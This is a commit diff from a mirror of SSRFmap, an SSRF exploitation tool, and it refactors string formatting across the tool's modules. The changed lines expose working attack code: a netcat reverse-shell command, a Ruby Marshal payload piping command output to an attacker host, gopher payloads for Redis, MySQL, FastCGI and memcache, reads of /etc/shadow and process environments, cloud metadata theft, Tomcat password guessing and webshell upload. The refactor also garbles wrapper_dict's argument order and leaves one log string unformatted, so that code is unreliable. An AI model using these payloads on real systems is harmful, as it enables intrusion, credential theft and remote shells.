swisskyrepo
/
SSRFmap
mirror of https://github.com/swisskyrepo/SSRFmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

- Added logging to file for better troubleshooting 

- Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted:
    - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string])
    - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}")

- Added missing 'module launched' message for SMTP
pull/41/head
Mili-NT 2022-03-16 14:27:30 -04:00
parent 490c8a5bc3
commit 908775e397
29 changed files with 110 additions and 103 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
core/handler.py
View File

@ -7,7 +7,7 @@ class Handler(threading.Thread):
def __init__(self, port): def __init__(self, port):
threading.Thread.__init__(self) threading.Thread.__init__(self)
logging.info("Handler listening on 0.0.0.0:{}".format(port)) logging.info(f"Handler listening on 0.0.0.0:{port}")
self.connected = False self.connected = False
self.port = int(port) self.port = int(port)
@ -18,12 +18,12 @@ class Handler(threading.Thread):
while True: while True:
self.socket.listen(5) self.socket.listen(5)
self.client, address = self.socket.accept() self.client, address = self.socket.accept()
print("Handler> New session from {}".format( address[0] )) print(f"Handler> New session from {address[0]}")
self.connected = True self.connected = True
response = self.client.recv(255) response = self.client.recv(255)
while response != b"": while response != b"":
print("\n{}\nShell > $ ".format(response.decode('utf_8', 'ignore').strip()), end='') print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='')
response = self.client.recv(255) response = self.client.recv(255)
def listen_command(self): def listen_command(self):

2
core/requester.py
View File

@ -137,10 +137,10 @@ class Requester(object):
verify=False verify=False
) )
except Exception as e: except Exception as e:
logging.error(e)
return None return None
return r return r
def __str__(self): def __str__(self):
text = self.method + " " text = self.method + " "
text += self.action + " HTTP/1.1\n" text += self.action + " HTTP/1.1\n"

4
core/ssrf.py
View File

@ -56,10 +56,10 @@ class SSRF(object):
self.modules.add(mymodule) self.modules.add(mymodule)
def load_handler(self, name): def load_handler(self, name):
handler_file = "{}.py".format(name) handler_file = f"{name}.py"
try: try:
location = os.path.join("./handlers", handler_file) location = os.path.join("./handlers", handler_file)
self.handler = SourceFileLoader(handler_file, location).load_module() self.handler = SourceFileLoader(handler_file, location).load_module()
except Exception as e: except Exception as e:
logging.error("Invalid no such handler: {}".format(name)) logging.error(f"Invalid no such handler: {name}")
exit(1) exit(1)

14
core/utils.py
View File

@ -3,24 +3,24 @@ import struct
import string import string
def wrapper_file(data): def wrapper_file(data):
return "file://{}".format(data) return f"file://{data}"
def wrapper_unc(data, ip): def wrapper_unc(data, ip):
return "\\\\{}\\{}".format(ip, data) return f"\\\\{ip}\\{data}"
def wrapper_gopher(data, ip, port): def wrapper_gopher(data, ip, port):
return "gopher://{}:{}/_{}".format(ip, port, data) return f"gopher://{ip}:{port}/_{data}"
def wrapper_dict(data, ip, port): def wrapper_dict(data, ip, port):
return "dict://{}:{}/{}".format(ip, port, data) return f"dict://{data}:{ip}/{port}"
def wrapper_http(data, ip, port, usernm=False, passwd=False): def wrapper_http(data, ip, port, usernm=False, passwd=False):
if usernm != False and passwd != False: if usernm != False and passwd != False:
return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data) return f"http://{usernm}:{passwd}@{ip}:{port}/{data}"
return "http://{}:{}/{}".format(ip, port, data) return f"http://{ip}:{port}/{data}"
def wrapper_https(data, ip, port): def wrapper_https(data, ip, port):
return "https://{}:{}/{}".format(ip, port, data) return f"https://{ip}:{port}/{data}"
def diff_text(text1, text2): def diff_text(text1, text2):

8
data/example.py
View File

@ -17,7 +17,7 @@ def hello():
@app.route("/ssrf", methods=['POST']) @app.route("/ssrf", methods=['POST'])
def ssrf(): def ssrf():
data = request.values data = request.values
content = command("curl {}".format(data.get('url'))) content = command(f"curl {data.get('url')}")
return content return content
# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2 # curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2
@ -26,14 +26,14 @@ def ssrf2():
data = request.json data = request.json
print(data) print(data)
print(data.get('url')) print(data.get('url'))
content = command("curl {}".format(data.get('url'))) content = command(f"curl {data.get('url')}")
return content return content
# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" # curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com"
@app.route("/ssrf3", methods=['GET']) @app.route("/ssrf3", methods=['GET'])
def ssrf3(): def ssrf3():
data = request.values data = request.values
content = command("curl {}".format(data.get('url'))) content = command(f"curl {data.get('url')}")
return content return content
# curl -X POST -H "Content-Type: application/xml" -d '<run><log encoding="hexBinary">4142430A</log><result>0</result><url>http://google.com</url></run>' http://127.0.0.1:5000/ssrf4 # curl -X POST -H "Content-Type: application/xml" -d '<run><log encoding="hexBinary">4142430A</log><result>0</result><url>http://google.com</url></run>' http://127.0.0.1:5000/ssrf4
@ -44,7 +44,7 @@ def ssrf4():
regex = re.compile("url>(.*?)</url") regex = re.compile("url>(.*?)</url")
try: try:
url = regex.findall(data.decode())[0] url = regex.findall(data.decode())[0]
content = command("curl {}".format(url)) content = command(f"curl {url}")
return content return content
except Exception as e: except Exception as e:
return e return e

4
handlers/http.py
View File

@ -23,13 +23,13 @@ class exploit(Handler):
if self.socket._closed or not response: if self.socket._closed or not response:
break break
logging.info("New session from : \033[32m{}\033[0m".format( address[0] )) logging.info(f"New session from : \033[32m{address[0]}\033[0m")
self.connected = True self.connected = True
regex = re.compile('(.*) (.*) HTTP') regex = re.compile('(.*) (.*) HTTP')
request_method, request_action = regex.findall(response)[0] request_method, request_action = regex.findall(response)[0]
request_param = urllib.parse.urlsplit(request_action).query request_param = urllib.parse.urlsplit(request_action).query
logging.info("Possible injected param: \033[32m{}\033[0m".format( request_param )) logging.info(f"Possible injected param: \033[32m{request_param}\033[0m")
self.injected_params.append(request_param) self.injected_params.append(request_param)
response_header = "HTTP/1.1 200 OK\n" response_header = "HTTP/1.1 200 OK\n"

6
modules/alibaba.py
View File

@ -11,7 +11,7 @@ class exploit():
endpoints = set() endpoints = set()
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.add_endpoints() self.add_endpoints()
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
@ -30,7 +30,7 @@ class exploit():
if diff != "": if diff != "":
# Display diff between default and ssrf request # Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(payload)) logging.info(f"\033[32mReading file\033[0m : {payload}")
print(diff) print(diff)
# Write diff to a file # Write diff to a file
@ -38,7 +38,7 @@ class exploit():
if filename == "": if filename == "":
filename = endpoint[1].split('/')[-2:-1][0] filename = endpoint[1].split('/')[-2:-1][0]
logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename)) logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f: with open(directory + "/" + filename, 'w') as f:
f.write(diff) f.write(diff)

6
modules/aws.py
View File

@ -16,7 +16,7 @@ class exploit():
endpoints = set() endpoints = set()
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.add_endpoints() self.add_endpoints()
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
@ -35,7 +35,7 @@ class exploit():
if diff != "": if diff != "":
# Display diff between default and ssrf request # Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(payload)) logging.info(f"\033[32mReading file\033[0m : {payload}")
print(diff) print(diff)
# Write diff to a file # Write diff to a file
@ -43,7 +43,7 @@ class exploit():
if filename == "": if filename == "":
filename = endpoint[1].split('/')[-2:-1][0] filename = endpoint[1].split('/')[-2:-1][0]
logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename)) logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f: with open(directory + "/" + filename, 'w') as f:
f.write(diff) f.write(diff)

2
modules/consul.py
View File

@ -16,7 +16,7 @@ documentation = [
class exploit(): class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
gen_host = gen_ip_list("127.0.0.1", args.level) gen_host = gen_ip_list("127.0.0.1", args.level)
port = "8500" port = "8500"

6
modules/custom.py
View File

@ -13,7 +13,7 @@ class exploit():
SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &" SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
gen_hosts = gen_ip_list("127.0.0.1", args.level) gen_hosts = gen_ip_list("127.0.0.1", args.level)
self.SERVICE_PORT = input("Service Port: ") self.SERVICE_PORT = input("Service Port: ")
self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: ")) self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
@ -22,9 +22,9 @@ class exploit():
payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT) payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
if args.verbose == True: if args.verbose == True:
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if args.verbose == True: if args.verbose == True:
logging.info("Module '{}' ended !".format(name)) logging.info(f"Module '{name}' ended !")

6
modules/digitalocean.py
View File

@ -11,7 +11,7 @@ class exploit():
endpoints = set() endpoints = set()
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.add_endpoints() self.add_endpoints()
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
@ -30,12 +30,12 @@ class exploit():
if diff != "": if diff != "":
# Display diff between default and ssrf request # Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(payload)) logging.info(f"\033[32mReading file\033[0m : {payload}")
print(diff) print(diff)
# Write diff to a file # Write diff to a file
filename = endpoint[1].split('/')[-1] filename = endpoint[1].split('/')[-1]
logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename)) logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f: with open(directory + "/" + filename, 'w') as f:
f.write(diff) f.write(diff)

14
modules/docker.py
View File

@ -15,7 +15,7 @@ documentation = []
class exploit(): class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
gen_host = gen_ip_list("127.0.0.1", args.level) gen_host = gen_ip_list("127.0.0.1", args.level)
port = "2375" port = "2375"
@ -33,9 +33,9 @@ class exploit():
container_command = container['Command'] container_command = container['Command']
logging.info("Found docker container") logging.info("Found docker container")
logging.info("\033[32mId\033[0m : {}".format(container_id)) logging.info(f"\033[32mId\033[0m : {container_id}")
logging.info("\033[32mName\033[0m : {}".format(container_name)) logging.info(f"\033[32mName\033[0m : {container_name}")
logging.info("\033[32mCommand\033[0m : {}\n".format(container_command)) logging.info(f"\033[32mCommand\033[0m : {container_command}\n")
# Step 2 - Extract id and name from each image # Step 2 - Extract id and name from each image
data = "images/json" data = "images/json"
@ -48,7 +48,7 @@ class exploit():
container_id = container['Id'] container_id = container['Id']
container_name = container['RepoTags'][0].replace('/','') container_name = container['RepoTags'][0].replace('/','')
logging.info("Found docker image n°{}".format(index)) logging.info(f"Found docker image n°{index}")
logging.info("\033[32mId\033[0m : {}".format(container_id)) logging.info(f"\033[32mId\033[0m : {container_id}")
logging.info("\033[32mName\033[0m : {}\n".format(container_name)) logging.info(f"\033[32mName\033[0m : {container_name}\n")
images[container_name] = container_id images[container_name] = container_id

2
modules/fastcgi.py
View File

@ -11,7 +11,7 @@ class exploit():
SERVER_PORT = "4242" SERVER_PORT = "4242"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Handle args for reverse shell # Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST = input("Server Host:") if args.lhost == None: self.SERVER_HOST = input("Server Host:")

6
modules/gce.py
View File

@ -15,7 +15,7 @@ class exploit():
endpoints = set() endpoints = set()
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.add_endpoints() self.add_endpoints()
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
@ -34,7 +34,7 @@ class exploit():
if diff != "": if diff != "":
# Display diff between default and ssrf request # Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(payload)) logging.info(f"\033[32mReading file\033[0m : {payload}")
print(diff) print(diff)
# Write diff to a file # Write diff to a file
@ -42,7 +42,7 @@ class exploit():
if filename == "": if filename == "":
filename = endpoint[1].split('/')[-2:-1][0] filename = endpoint[1].split('/')[-2:-1][0]
logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename)) logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f: with open(directory + "/" + filename, 'w') as f:
f.write(diff) f.write(diff)

6
modules/github.py
View File

@ -13,7 +13,7 @@ documentation = [
class exploit(): class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Data for the service # Data for the service
ip = "0" ip = "0"
@ -22,7 +22,7 @@ class exploit():
cmd = "id | nc SERVER_HOST SERVER_PORT" cmd = "id | nc SERVER_HOST SERVER_PORT"
# cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh" # cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh"
marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'.format(cmd) marshal_code = f'\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{cmd}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
payload = [ payload = [
'', '',
'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code), 'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
@ -43,4 +43,4 @@ class exploit():
logging.info("You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'") logging.info("You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'")
logging.info("Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'") logging.info("Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'")
logging.info('Payload : {}'.format(payload)) logging.info(f"Payload : {payload}")

8
modules/httpcollaborator.py
View File

@ -25,7 +25,7 @@ class exploit():
SERVER_PORT = "4242" SERVER_PORT = "4242"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Handle args for httpcollaborator # Handle args for httpcollaborator
if args.lhost == None: self.SERVER_HOST = input("Server Host:") if args.lhost == None: self.SERVER_HOST = input("Server Host:")
@ -36,8 +36,8 @@ class exploit():
params = args.param.split(",") params = args.param.split(",")
for param in params: for param in params:
logging.info("Testing PARAM: {}".format(param)) logging.info(f"Testing PARAM: {param}")
payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip() ) payload = wrapper_http(f"?{param}", args.lhost, args.lport.strip() )
r = requester.do_request(param, payload) r = requester.do_request(param, payload)
logging.info("Module '{}' finished !".format(name)) logging.info(f"Module '{name}' finished !")

10
modules/memcache.py
View File

@ -13,12 +13,12 @@ class exploit():
SERVICE_DATA = "\r\n" SERVICE_DATA = "\r\n"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
gen_host = gen_ip_list("127.0.0.1", args.level) gen_host = gen_ip_list("127.0.0.1", args.level)
payload = input("Data to store: ") payload = input("Data to store: ")
self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload)) self.SERVICE_DATA += f'set payloadname 0 0 {len(payload)}\r\n'
self.SERVICE_DATA += '{}\r\n'.format(payload) self.SERVICE_DATA += f'{payload}\r\n'
self.SERVICE_DATA += 'quit\r\n' self.SERVICE_DATA += 'quit\r\n'
self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA) self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
@ -26,9 +26,9 @@ class exploit():
payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT) payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
if args.verbose == True: if args.verbose == True:
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if args.verbose == True: if args.verbose == True:
logging.info("Module '{}' ended !".format(name)) logging.info("Module '{name}' ended !")

8
modules/mysql.py
View File

@ -23,14 +23,14 @@ class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Encode the username for the request # Encode the username for the request
self.user = input("Give MySQL username: ") self.user = input("Give MySQL username: ")
encode_user = binascii.hexlify( self.user.encode() ) encode_user = binascii.hexlify( self.user.encode() )
user_length = len(self.user) user_length = len(self.user)
temp = user_length - 4 temp = user_length - 4
length = '{:x}'.format(0xa3 + temp) length = f'{(0xa3 + temp):x}'
# Authenticate to MySQL service - only work with users allowed without password # Authenticate to MySQL service - only work with users allowed without password
dump = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000" dump = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
@ -67,7 +67,7 @@ class exploit():
gen_host = gen_ip_list("127.0.0.1", args.level) gen_host = gen_ip_list("127.0.0.1", args.level)
for ip in gen_host: for ip in gen_host:
payload = self.get_payload(self.query, auth, ip) payload = self.get_payload(self.query, auth, ip)
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
r1 = requester.do_request(args.param, payload) r1 = requester.do_request(args.param, payload)
r2 = requester.do_request(args.param, "") r2 = requester.do_request(args.param, "")
@ -84,7 +84,7 @@ class exploit():
def get_payload(self, query, auth, ip): def get_payload(self, query, auth, ip):
if(query.strip()!=''): if(query.strip()!=''):
query = binascii.hexlify( query.encode() ) query = binascii.hexlify( query.encode() )
query_length = '{:x}'.format((int((len(query) / 2) + 1))) query_length = f'{(int((len(query) / 2) + 1)):x}'
pay1 = query_length.rjust(2,'0') + "00000003" + query.decode() pay1 = query_length.rjust(2,'0') + "00000003" + query.decode()
final = self.encode(auth + pay1 + "0100000001", ip) final = self.encode(auth + pay1 + "0100000001", ip)
return final return final

4
modules/networkscan.py
View File

@ -13,7 +13,7 @@ class exploit():
ips = set() ips = set()
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# concurrent requests in order to limit the time # concurrent requests in order to limit the time
self.add_range("192.168.1.0/24") # Default network self.add_range("192.168.1.0/24") # Default network
@ -50,7 +50,7 @@ class exploit():
if (not "Connection refused" in r.text) and (r.text != compare.text): if (not "Connection refused" in r.text) and (r.text != compare.text):
timer = datetime.today().time().replace(microsecond=0) timer = datetime.today().time().replace(microsecond=0)
print("\t[{}] Found host :{}".format(timer, host+ " "*40)) print(f"\t[{timer}] Found host :{host+ ' '*40}")
timer = datetime.today().time().replace(microsecond=0) timer = datetime.today().time().replace(microsecond=0)
except Exception as e: except Exception as e:

10
modules/portscan.py
View File

@ -11,7 +11,7 @@ documentation = []
class exploit(): class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
load_ports = "" load_ports = ""
@ -38,18 +38,18 @@ class exploit():
# Check if the request is the same # Check if the request is the same
if r.text != '' and r.text != compare.text: if r.text != '' and r.text != compare.text:
print("\t[{}] IP:{:12s}, Found \033[32mopen \033[0m port n°{}".format(timer, host, port)) print(f"\t[{timer}] IP:{host:12s}, Found \033[32mopen \033[0m port n°{port}")
else: else:
print("\t[{}] IP:{:12s}, Found \033[31mfiltered\033[0m port n°{}".format(timer, host, port)) print(f"\t[{timer}] IP:{host:12s}, Found \033[31mfiltered\033[0m port n°{port}")
timer = datetime.today().time().replace(microsecond=0) timer = datetime.today().time().replace(microsecond=0)
port = port.strip() + " "*20 port = port.strip() + " "*20
print("\t[{}] Checking port n°{}".format(timer, port), end='\r'), print(f"\t[{timer}] Checking port n°{port}", end='\r'),
# Timeout is a potential port # Timeout is a potential port
except Exception as e: except Exception as e:
print(e) print(e)
timer = datetime.today().time().replace(microsecond=0) timer = datetime.today().time().replace(microsecond=0)
port = port.strip() + " "*20 port = port.strip() + " "*20
print("\t[{}] IP:{:212}, \033[33mTimed out\033[0m port n°{}".format(timer, host, port)) print(f"\t[{timer}] IP:{host:212}, \033[33mTimed out\033[0m port n°{port}")
pass pass

6
modules/readfiles.py
View File

@ -11,7 +11,7 @@ documentation = []
class exploit(): class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"] self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]
r = requester.do_request(args.param, "") r = requester.do_request(args.param, "")
@ -30,12 +30,12 @@ class exploit():
if diff != "": if diff != "":
# Display diff between default and ssrf request # Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(f)) logging.info(f"\033[32mReading file\033[0m : {f}")
print(diff) print(diff)
# Write diff to a file # Write diff to a file
filename = f.replace('\\','_').replace('/','_') filename = f.replace('\\','_').replace('/','_')
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename)) logging.info(f"\033[32mWriting file\033[0m : {f} to {directory + '/' + filename}")
with open(directory + "/" + filename, 'w') as f: with open(directory + "/" + filename, 'w') as f:
f.write(diff) f.write(diff)

6
modules/redis.py
View File

@ -15,7 +15,7 @@ class exploit():
SERVER_CRON = "/var/lib/redis" SERVER_CRON = "/var/lib/redis"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Handle args for reverse shell # Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST = input("Server Host:") if args.lhost == None: self.SERVER_HOST = input("Server Host:")
@ -46,13 +46,13 @@ class exploit():
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD)) payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
if args.verbose == True: if args.verbose == True:
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
# Send the payload # Send the payload
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if args.verbose == True: if args.verbose == True:
logging.info("Module '{}' ended !".format(name)) logging.info(f"Module '{name}' ended !")
""" """
TODO: TODO:

4
modules/smbhash.py
View File

@ -15,7 +15,7 @@ class exploit():
UNC_FILE = "SSRFmap" UNC_FILE = "SSRFmap"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
UNC_IP = input("UNC IP (default: 192.168.1.2): ") UNC_IP = input("UNC IP (default: 192.168.1.2): ")
if UNC_IP != '': if UNC_IP != '':
@ -27,4 +27,4 @@ class exploit():
payload = wrapper_unc(self.UNC_FILE, self.UNC_IP) payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
logging.info("\033[32mSending UNC Path\033[0m : {}".format(payload)) logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")

1
modules/smtp.py
View File

@ -15,6 +15,7 @@ class exploit():
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
self.mailto = input("[MAILTO] Give a mail (e.g: hacker@example.com): ") self.mailto = input("[MAILTO] Give a mail (e.g: hacker@example.com): ")
gen_host = gen_ip_list("127.0.0.1", args.level) gen_host = gen_ip_list("127.0.0.1", args.level)

4
modules/socksproxy.py
View File

@ -30,11 +30,11 @@ class exploit():
TIMEOUT = 5 TIMEOUT = 5
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((self.HOST, self.PORT)) server.bind((self.HOST, self.PORT))
server.listen(2) server.listen(2)
logging.info("Listener ready on port {}".format(self.PORT)) logging.info(f"Listener ready on port {self.PORT}")
try: try:
while 1: while 1:
client, addr = server.accept() client, addr = server.accept()

2
modules/template.py
View File

@ -11,7 +11,7 @@ class exploit():
SERVER_PORT = "4242" SERVER_PORT = "4242"
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
# Handle args for reverse shell # Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST = input("Server Host:") if args.lhost == None: self.SERVER_HOST = input("Server Host:")

22
modules/tomcat.py
View File

@ -36,7 +36,7 @@ class exploit():
tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"] tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
def __init__(self, requester, args): def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name)) logging.info(f"Module '{name}' launched !")
self.args = args self.args = args
# Using a generator to create the host list # Using a generator to create the host list
@ -48,7 +48,7 @@ class exploit():
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if r != None and not "s3cret" in r.text: if r != None and not "s3cret" in r.text:
logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss)) logging.info(f"Found credential \033[32m{usr}\033[0m:\033[32m{pss}\033[0m")
self.SERVER_USER = usr self.SERVER_USER = usr
self.SERVER_PASS = pss self.SERVER_PASS = pss
@ -61,9 +61,9 @@ class exploit():
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if args.verbose == True: if args.verbose == True:
logging.info("Generated payload : {}".format(payload)) logging.info(f"Generated payload : {payload}")
logging.info("Sending CMD to cmd.jsp for padding: {}".format(i)) logging.info(f"Sending CMD to cmd.jsp for padding: {i}")
payload = wrapper_http("cmd/cmd.jsp?cmd=whoami", self.SERVER_HOST, self.SERVER_PORT) payload = wrapper_http("cmd/cmd.jsp?cmd=whoami", self.SERVER_HOST, self.SERVER_PORT)
r = requester.do_request(args.param, payload) r = requester.do_request(args.param, payload)
if r.text != None and r.text != "": if r.text != None and r.text != "":
@ -101,12 +101,12 @@ class exploit():
modded_length=0 modded_length=0
if self.args.verbose == True: if self.args.verbose == True:
logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) logging.info(f"Original file length: {len(webshell_data):08X}")
logging.info("Original file crc32: {}".format(format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x'))) logging.info(f"Original file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}")
while valid_length == 0 or valid_crc32 == 0: while valid_length == 0 or valid_crc32 == 0:
crc_string = format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x') crc_string = f"{binascii.crc32(webshell_data.encode())& 0xffffffff:x}"
ws_len_byte_string = '{0:0{1}X}'.format(len(webshell_data),8) ws_len_byte_string = f"{len(webshell_data):08X}"
valid_length=1 valid_length=1
valid_crc32=1 valid_crc32=1
lead_byte_locations = [0,2,4,6] lead_byte_locations = [0,2,4,6]
@ -123,12 +123,12 @@ class exploit():
if modded_length > 0: if modded_length > 0:
logging.info("The input file CRC32 or file length contained an invalid byte.") logging.info("The input file CRC32 or file length contained an invalid byte.")
logging.info("Length adjustment completed. " + str(modded_length) + " whitespace ' ' chars were added to the webshell input.") logging.info("Length adjustment completed. " + str(modded_length) + " whitespace ' ' chars were added to the webshell input.")
logging.info("New file length: " +'{0:0{1}X}'.format(len(webshell_data),8)) logging.info(f"New file length: {len(webshell_data):08X}")
logging.info("New file crc32: " + format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x')) logging.info(f"New file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}")
